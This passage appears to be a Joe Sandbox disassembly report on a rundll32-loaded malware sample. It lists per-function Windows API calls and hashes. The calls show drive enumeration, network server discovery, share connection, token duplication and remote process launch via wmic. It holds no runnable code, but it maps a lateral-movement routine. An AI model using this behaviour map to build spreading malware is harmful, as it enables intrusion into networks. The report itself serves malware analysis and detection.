                                                                      • Instruction Fuzzy Hash: E92130B290011CBEEF50DE94DCC4DEE7BBCEB05364F504695F628D6190D674AE458F60
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,00000034,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C6F
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C78
                                                                      • InitializeCriticalSection.KERNEL32(00000000,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C81
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856CAC
                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856CAF
                                                                        • Part of subcall function 04856BD1: GetProcessHeap.KERNEL32(00000000,?,74DEF380,76ED5E70,?,?,04856CBD,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C29
                                                                        • Part of subcall function 04856BD1: HeapFree.KERNEL32(00000000,?,?,04856CBD,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C2C
                                                                        • Part of subcall function 04856BD1: GetProcessHeap.KERNEL32(00000000,?,74DEF380,76ED5E70,?,?,04856CBD,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C39
                                                                        • Part of subcall function 04856BD1: HeapFree.KERNEL32(00000000,?,?,04856CBD,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C3C
                                                                        • Part of subcall function 04856BD1: GetProcessHeap.KERNEL32(00000000,?,74DEF380,76ED5E70,?,?,04856CBD,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C4E
                                                                        • Part of subcall function 04856BD1: HeapFree.KERNEL32(00000000,?,?,04856CBD,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C51
                                                                        • Part of subcall function 04856BD1: GetProcessHeap.KERNEL32(00000000,00000000,74DEF380,76ED5E70,?,?,04856CBD,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C56
                                                                        • Part of subcall function 04856BD1: HeapFree.KERNEL32(00000000,?,?,04856CBD,?,?,00000000,?,04857A55,00000024,04856AA8,00000000,0000FFFF), ref: 04856C59
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Free$AllocAllocateCriticalInitializeSection
                                                                      • String ID:
                                                                      • API String ID: 1652351593-0
                                                                      • Opcode ID: bad62e885ef6972c879c9748ab0f17587152169db6585a803e08213f85c877c8
                                                                      • Instruction ID: 79631907c18a5fc51030a65cdb1ae3bda493d9618ad0901432afa96dd32865cb
                                                                      • Opcode Fuzzy Hash: bad62e885ef6972c879c9748ab0f17587152169db6585a803e08213f85c877c8
                                                                      • Instruction Fuzzy Hash: 45014B716007156BD320DFAAD840A1BF7ECFF48750F408A1AED49D7350DA74E9008BA4
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,00000004,74DF0F10,?,00000000,?,?,04857B89,000000FF), ref: 0485A436
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,04857B89,000000FF), ref: 0485A439
                                                                      • CreateThread.KERNELBASE(00000000,00000000,0485A333,00000000,00000000,00000000), ref: 0485A454
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?,04857B89,000000FF), ref: 0485A463
                                                                      • HeapFree.KERNEL32(00000000,?,?,04857B89,000000FF), ref: 0485A466
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocCreateFreeThread
                                                                      • String ID:
                                                                      • API String ID: 3966119241-0
                                                                      • Opcode ID: 944778fba6f0b1186ed37a1384a820a4b7499b4e2a74c30f790aad059a0619b8
                                                                      • Instruction ID: 87ec5faa2cecda75eb7ec5124e8c149bad2eb4f17633bec48b4870a129aad4e0
                                                                      • Opcode Fuzzy Hash: 944778fba6f0b1186ed37a1384a820a4b7499b4e2a74c30f790aad059a0619b8
                                                                      • Instruction Fuzzy Hash: 9FF030B5500319BFD7106FA5ACCCC9BBFACEB85295B108929FA01D7200D578AD04CA60
                                                                      APIs
                                                                      • GetLogicalDrives.KERNELBASE ref: 0485637A
                                                                      • GetDriveTypeW.KERNELBASE(?), ref: 048563B8
                                                                      • LocalAlloc.KERNEL32(00000040,00000050), ref: 048563C7
                                                                      • CreateThread.KERNELBASE(00000000,00000000,04856299,00000000,00000000,00000000), ref: 04856404
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocCreateDriveDrivesLocalLogicalThreadType
                                                                      • String ID:
                                                                      • API String ID: 2320387513-0
                                                                      • Opcode ID: 136e65ebeb40e0f2a8c0b5e7164b1e5ea5ea2a21271dff9f40ef66c60bf84add
                                                                      • Instruction ID: 8e567ff3bdc45d70d5f66b33da2a1bae78d6ddf63fc092fb9448c6fa41570221
                                                                      • Opcode Fuzzy Hash: 136e65ebeb40e0f2a8c0b5e7164b1e5ea5ea2a21271dff9f40ef66c60bf84add
                                                                      • Instruction Fuzzy Hash: 53119375A00304EFDB40DFA4D845AAEBBB9FF88711F50C85AE909EB291E734A941CB54
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 0485A18B
                                                                      • HeapFree.KERNEL32(00000000), ref: 0485A194
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 0485A199
                                                                      • HeapFree.KERNEL32(00000000), ref: 0485A19C
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$FreeProcess
                                                                      • String ID:
                                                                      • API String ID: 3859560861-0
                                                                      • Opcode ID: e69806d0c1b7207d3e46253969911f369092d32a63daf5f3070d4aaf544c8ac3
                                                                      • Instruction ID: 4ffd1f58937c902ade9ba465897f1aaff8c6499cbdbf3b045660764bbacb8d62
                                                                      • Opcode Fuzzy Hash: e69806d0c1b7207d3e46253969911f369092d32a63daf5f3070d4aaf544c8ac3
                                                                      • Instruction Fuzzy Hash: FF117C72640315AAE711BA69AC80F2B779CEB84760F040B25FD04D7250EB64FD058AF2
                                                                      APIs
                                                                        • Part of subcall function 04857E69: PathCombineW.SHLWAPI(?,C:\Windows\,cscc.dat,00000000,?,04857EA6,?), ref: 04857E7C
                                                                      • PathFileExistsW.KERNELBASE(?,?), ref: 04857EB1
                                                                      • GetCurrentProcess.KERNEL32(?,?), ref: 04857EC3
                                                                        • Part of subcall function 04856F7C: GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,?,04857170,00000000,?,04857AF8), ref: 04856F8E
                                                                        • Part of subcall function 04856F7C: GetProcAddress.KERNEL32(00000000), ref: 04856F95
                                                                        • Part of subcall function 04858313: FindResourceW.KERNEL32(?,00000006,00000000,?), ref: 0485832A
                                                                        • Part of subcall function 04858313: LoadResource.KERNEL32(00000000), ref: 04858341
                                                                        • Part of subcall function 04858313: LockResource.KERNEL32(00000000), ref: 04858350
                                                                        • Part of subcall function 04858313: SizeofResource.KERNEL32(00000000), ref: 04858368
                                                                        • Part of subcall function 04858313: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 04858384
                                                                        • Part of subcall function 04858313: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0485838D
                                                                        • Part of subcall function 04858313: memcpy.MSVCRT(00000000,00000002,?,?,00000002), ref: 0485839C
                                                                        • Part of subcall function 04858313: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000002), ref: 048583B9
                                                                        • Part of subcall function 04858313: RtlAllocateHeap.NTDLL(00000000,?,?,?,00000002), ref: 048583BC
                                                                        • Part of subcall function 04858313: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000002), ref: 0485840A
                                                                        • Part of subcall function 04858313: RtlFreeHeap.NTDLL(00000000,?,?,?,00000002), ref: 0485840D
                                                                        • Part of subcall function 048587E7: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,048511BB,?,?), ref: 048587FC
                                                                        • Part of subcall function 048587E7: WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,00000000,?,048511BB,?,?), ref: 04858813
                                                                        • Part of subcall function 048587E7: CloseHandle.KERNELBASE(00000000,?,00000000,?,048511BB,?,?), ref: 04858824
                                                                      • ExitProcess.KERNEL32 ref: 04857EFD
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Resource$File$AllocateHandlePath$AddressCloseCombineCreateCurrentExistsExitFindFreeLoadLockModuleProcSizeofWritememcpy
                                                                      • String ID:
                                                                      • API String ID: 711742280-0
                                                                      • Opcode ID: 54652480e19b68f5546d49213510c5759969002c68c93c764f9c62991e0ebcc6
                                                                      • Instruction ID: 0a6cbd5b39776bde8864d4adc27c3b5798f17abcb94fb12a51f645d454d7e862
                                                                      • Opcode Fuzzy Hash: 54652480e19b68f5546d49213510c5759969002c68c93c764f9c62991e0ebcc6
                                                                      • Instruction Fuzzy Hash: BDF0A472D002196BEF10AAF4DC44DDEB2ACEB08644F404A91AD01E2050E778EE158A61
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000,?,?,?,04857201,?,?,?,04857AF8), ref: 04856FC5
                                                                      • WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,?,04857201,?,?,?,04857AF8), ref: 04856FDF
                                                                      • CloseHandle.KERNEL32(00000000,?,?,04857201,?,?,?,04857AF8), ref: 04856FF0
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                       • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseCreateHandleWrite
                                                                      • String ID:
                                                                      • API String ID: 1065093856-0
                                                                      • Opcode ID: b34872226f97c5cca11fc99aa50b5940b97aba6ab3a5685b79b07562cb92e5d4
                                                                      • Instruction ID: d7252a4b08a3221854d151810b7693d35610d9e366ea6eab4e1ed53fae182432
                                                                      • Opcode Fuzzy Hash: b34872226f97c5cca11fc99aa50b5940b97aba6ab3a5685b79b07562cb92e5d4
                                                                      • Instruction Fuzzy Hash: 2EF05E31601124BADB305E66EC4CEABBE6CEB457F0F408512FD1DD6190D634E941C6E0
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,048511BB,?,?), ref: 048587FC
                                                                      • WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,00000000,?,048511BB,?,?), ref: 04858813
                                                                      • CloseHandle.KERNELBASE(00000000,?,00000000,?,048511BB,?,?), ref: 04858824
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                       • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseCreateHandleWrite
                                                                      • String ID:
                                                                      • API String ID: 1065093856-0
                                                                      • Opcode ID: a7de5bf90dd2bfaa452c6aeecc2ff030d455ed12d6706c2bc59f82f33a4adcf4
                                                                      • Instruction ID: 9dd2e4ce375570a6464000b89c30a9edda2f461f992fd1508e3672156d9fdd17
                                                                      • Opcode Fuzzy Hash: a7de5bf90dd2bfaa452c6aeecc2ff030d455ed12d6706c2bc59f82f33a4adcf4
                                                                      • Instruction Fuzzy Hash: FDF0A271201124BADB306D56EC4CEEB7E5CEF466F2B108526FD1DC5060D634D951D6E1
                                                                      APIs
                                                                      • Sleep.KERNELBASE(?), ref: 0485A344
                                                                      • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0485A399
                                                                      • HeapFree.KERNEL32(00000000), ref: 0485A3A0
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                       • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$FreeProcessSleep
                                                                      • String ID:
                                                                      • API String ID: 1803097132-0
                                                                      • Opcode ID: 40b080e40d55f6ae5f374d0968d081e72d62dc3b1a8126d6e7ec4b5764875da9
                                                                      • Instruction ID: 225a16caa908c2d30f5c027ce390f22d4c2106f9f08b5c12a990f6b7ddeb7730
                                                                      • Opcode Fuzzy Hash: 40b080e40d55f6ae5f374d0968d081e72d62dc3b1a8126d6e7ec4b5764875da9
                                                                      • Instruction Fuzzy Hash: 08012C725043066BE710EEB99C84DABB7ACEF84219F440E29AD05D2160EB64F958C7A2
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                       • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: malloc
                                                                      • String ID: @
                                                                      • API String ID: 2803490479-2766056989
                                                                      • Opcode ID: 5e5a39593a171c8ffb335b1a1743c75cee4799fa41ae935cf4f20db1a55186ab
                                                                      • Instruction ID: 29bfd846d9bdbea1957430821e31c6b2b96afb7f8766cf744a2d592404a01c79
                                                                      • Opcode Fuzzy Hash: 5e5a39593a171c8ffb335b1a1743c75cee4799fa41ae935cf4f20db1a55186ab
                                                                      • Instruction Fuzzy Hash: ECC12875A0035A8FCB14CFA8C4845AEBBF1BF89304F144A6AEC11E7360E734AA55CF90
                                                                      APIs
                                                                      • NetServerEnum.NETAPI32(00000000,00000065,?,000000FF,?,?,?,?,?), ref: 0485754C
                                                                      • NetApiBufferFree.NETAPI32(?), ref: 048575C9
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                       • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: BufferEnumFreeServer
                                                                      • String ID:
                                                                      • API String ID: 2429717511-0
                                                                      • Opcode ID: 465752ae96020d888f3ba9c1e3d600c6351a1050cacf2f6b7677acd2eac2e1d3
                                                                      • Instruction ID: 6c45aa4f120e4579d2c2c6da3d739c577926f845e8821066f20eef82a05d5602
                                                                      • Opcode Fuzzy Hash: 465752ae96020d888f3ba9c1e3d600c6351a1050cacf2f6b7677acd2eac2e1d3
                                                                      • Instruction Fuzzy Hash: 272149B6900219EFDB21CF94C844AEEBBB9FB04714F108A16FD15E6160E370B750DB91
                                                                      APIs
                                                                        • Part of subcall function 04856477: GetTickCount.KERNEL32 ref: 04856477
                                                                      • NetServerGetInfo.NETAPI32(00000000,00000065,?,?,?,00000000,?,?,04857AA3,?,?,000000FF,?,?), ref: 04857DF6
                                                                      • NetApiBufferFree.NETAPI32(?,?,?,00000000,?,?,04857AA3,?,?,000000FF,?,?), ref: 04857E0F
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                       • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: BufferCountFreeInfoServerTick
                                                                      • String ID:
                                                                      • API String ID: 2934114180-0
                                                                      • Opcode ID: abe473bbaf3a52ef4665a5ce4b66e0922edda1a0bbf6aa656c6d57294e1b3905
                                                                      • Instruction ID: ca467701db898af35b61bb2a5879211e2c7dba99774cc7c666b7d401aae9db08
                                                                      • Opcode Fuzzy Hash: abe473bbaf3a52ef4665a5ce4b66e0922edda1a0bbf6aa656c6d57294e1b3905
                                                                      • Instruction Fuzzy Hash: FA118672B003099FE724CE69D885F6EB7AAEB80F50F18CA29ED05DB190E774ED049750
                                                                      APIs
                                                                      • EnterCriticalSection.KERNEL32(?,00000000,?,?,?,04856E98,?,00000000,?,?,04856A84,?,?), ref: 04856DB5
                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,04856E98,?,00000000,?,?,04856A84,?,?), ref: 04856E0C
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                       • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave
                                                                      • String ID:
                                                                      • API String ID: 3168844106-0
                                                                      • Opcode ID: 3220a556c04843ff7155c9302a717f04073db0575afe87868ebfb83cfc2c6d2c
                                                                      • Instruction ID: 930645edad51f7b3d8ef83de35eb94adf813b8f7d331c3ce093aa83ae004a6b2
                                                                      • Opcode Fuzzy Hash: 3220a556c04843ff7155c9302a717f04073db0575afe87868ebfb83cfc2c6d2c
                                                                      • Instruction Fuzzy Hash: 1F116935B01A009FC725CF6AC880A5AF7E6FF893147544A29E84AD7321EB31FD118A50
                                                                      APIs
                                                                      • StrCmpIW.KERNELBASE(00000000,?), ref: 04856ABD
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                       • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fb608ae191e47f6e111acb4c342fec6c1bdf451b51838430878aa7003c66327f
                                                                      • Instruction ID: 7d73e6eaccc787f73c9e567f3d0915524486a57f5f6aabf01f8a57b29d6c3374
                                                                      • Opcode Fuzzy Hash: fb608ae191e47f6e111acb4c342fec6c1bdf451b51838430878aa7003c66327f
                                                                      • Instruction Fuzzy Hash: A0D05E3116420DEEEB125E64D808BB83B98E71030AF84C920BD0ED40B0E675A1E8DA40
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                       • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                       • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: malloc
                                                                      • String ID:
                                                                      • API String ID: 2803490479-0
                                                                      • Opcode ID: 4f30984e569958c364644897db368958a38db670780f4f6cfd8e814dd52d1b5e
                                                                      • Instruction ID: f6b68f43853c7c4a1e175cb9d1d57efc90aee00baec878968b5cb486e607e705
                                                                      • Opcode Fuzzy Hash: 4f30984e569958c364644897db368958a38db670780f4f6cfd8e814dd52d1b5e
                                                                      • Instruction Fuzzy Hash: 22B0123311830D5B9F08EEDCE9C2C5A73DCEAA4524B404906FD1CCF150E971F6104659
                                                                      APIs
                                                                      • wsprintfW.USER32 ref: 04859BA5
                                                                        • Part of subcall function 048588D3: PathFindFileNameW.SHLWAPI(04867BC8,75BF73E0,?,048595B2), ref: 048588E3
                                                                      • wsprintfW.USER32 ref: 04859BF2
                                                                      • wsprintfW.USER32 ref: 04859C16
                                                                      • PathFindExtensionW.SHLWAPI(?), ref: 04859C22
                                                                      • wsprintfW.USER32 ref: 04859C41
                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 04859C59
                                                                      • PathFileExistsW.SHLWAPI(?), ref: 04859C69
                                                                      • GetLastError.KERNEL32 ref: 04859C73
                                                                      • GetLastError.KERNEL32(?), ref: 04859C9A
                                                                      • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 04859CDD
                                                                      • GetCurrentThread.KERNEL32 ref: 04859D1B
                                                                      • OpenThreadToken.ADVAPI32(00000000), ref: 04859D22
                                                                      • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000001,?), ref: 04859D3C
                                                                      • memset.MSVCRT ref: 04859D62
                                                                      • GetSystemDirectoryW.KERNEL32 ref: 04859D8A
                                                                      • PathAppendW.SHLWAPI(?,wbem\wmic.exe), ref: 04859DAA
                                                                      • PathFileExistsW.SHLWAPI(?), ref: 04859DB7
                                                                      • wsprintfW.USER32 ref: 04859DD8
                                                                      • CreateProcessAsUserW.ADVAPI32(?,?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,?), ref: 04859E24
                                                                      • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,?,00000104), ref: 04859E2C
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000104), ref: 04859E3B
                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 04859E4B
                                                                      • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04859E59
                                                                      • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04859E63
                                                                      • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04859E6D
                                                                      • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04859E77
                                                                      • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04859E81
                                                                      • PathFileExistsW.SHLWAPI(?,?,?,00000104), ref: 04859E99
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000104), ref: 04859EA6
                                                                      • DeleteFileW.KERNEL32(?), ref: 04859EC5
                                                                      • CloseHandle.KERNEL32(?), ref: 04859ED7
                                                                      • CloseHandle.KERNEL32(?), ref: 04859EE4
                                                                        • Part of subcall function 048568B5: GetProcessHeap.KERNEL32(00000008,?,75BF73E0,00000000), ref: 048568EB
                                                                        • Part of subcall function 048568B5: HeapAlloc.KERNEL32(00000000), ref: 048568F4
                                                                        • Part of subcall function 048568B5: memcpy.MSVCRT(?,?,?), ref: 04856921
                                                                        • Part of subcall function 048568B5: GetProcessHeap.KERNEL32(00000008,?,74DEE010), ref: 04856946
                                                                        • Part of subcall function 048568B5: HeapAlloc.KERNEL32(00000000), ref: 04856949
                                                                        • Part of subcall function 048568B5: memcpy.MSVCRT(?,?,?), ref: 04856978
                                                                        • Part of subcall function 048568B5: GetProcessHeap.KERNEL32(00000000,?,?), ref: 04856995
                                                                        • Part of subcall function 048568B5: HeapFree.KERNEL32(00000000), ref: 04856998
                                                                        • Part of subcall function 048568B5: GetProcessHeap.KERNEL32(00000000,?), ref: 0485699F
